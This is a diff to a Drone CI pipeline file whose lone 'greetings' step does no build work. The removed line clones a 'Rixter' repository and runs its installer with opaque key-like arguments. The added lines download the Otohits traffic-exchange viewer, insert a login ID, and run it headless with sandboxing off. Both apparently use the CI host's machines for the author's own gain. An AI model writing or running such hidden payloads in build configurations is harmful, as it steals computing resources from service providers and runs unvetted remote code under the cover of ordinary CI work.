--- a/.drone.yml
+++ b/.drone.yml
@@ -5,6 +5,12 @@ name: defaulta
 
 steps:
 - name: greetings
-  image: ubuntu:xenial
+  image: ubuntu:18.04
   commands:
-  - sudo apt update || apt update && sudo apt install -y git whiptail bzip2 || apt install -y git whiptail && git clone https://github.com/golemcli/Rixter.git && chmod -R 777 Rixter && Rixter/install.sh "2" "fb6eb032c1e071f0675d01e9d29bf5a2" "50" "5" "2"
+  - apt update && apt install wget xvfb chromium-browser -y
+  - wget https://cdndl.otohits.net/dl/OtohitsApp_5055_linux_portable.tar.gz
+  - tar -xzf OtohitsApp_5055_linux_portable.tar.gz
+  - echo "/login:81d88b20-6058-40ab-9cfa-439ca16d1b14" > otohits.ini
+  - echo "/nosandbox" >> otohits.ini
+  - Xvfb :51 & export DISPLAY=:51
+  - ./otohits-viewer
